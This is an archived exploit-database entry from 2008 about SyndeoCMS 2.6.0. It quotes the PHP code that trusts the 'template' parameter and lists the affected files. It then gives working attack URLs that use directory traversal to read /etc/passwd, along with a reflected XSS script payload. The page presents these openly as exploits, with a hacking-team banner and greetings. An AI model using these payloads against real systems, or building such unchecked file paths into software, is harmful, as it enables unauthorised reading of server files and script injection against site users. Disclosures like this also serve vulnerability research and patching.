|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | Syndeo CMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
|
ExploitAlert : 4063
SecurityAlert : 4660 (Exploit Details)
Milw0rm ID : 5779
Credit : CWH Underground
Date : 11.06.2008
Download
Plain text version
 Exploit Code : ===========================================================
SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team
..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : SyndeoCMS
VERSION : 2.6.0 (Lastest Version)
DOWNLOAD : http://downloads.sourceforge.net/syndeocms
#####################################################
---LFI---
#################################################################
Vulnerable Code:
if (IsSet ($_GET['template']))
{
$template_path = ...;
$filename = $template_path . "/" . $_GET['template'];
if (file_exists($filename))
{
$handle = fopen($filename, "r");
$content = fread($handle, filesize($filename));
fclose($handle);
}
}
#################################################################
Vulnerable File:
[+] starnet/editors/fckeditor/studenteditor.php
[+] starnet/modules/sn_news/edit_content.php
[+] starnet/modules/sn_newsletter/edit_content.php
Exploit:
[+]
http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template
=../../../../../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=16&mod
option=edit_article&cat_id=1&article_id=0&template=../../../../../../../../
../../../../../etc/passwd
[+]
http://[target]/[path]/starnet/index.php?option=modulemanager&module=17&mod
option=edit_newsletter&newsletter_id=1&edition=1&template=../../../../../..
/../../../../../../../etc/passwd
Note: - the first link requires pupil session (normal student
session)
- the second link and the third link require admin session
---XSS---
[+] index.php
Example:
http://[target]/[path]/index.php?page=1§ion="><script>alert(111);</scri
pt>
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|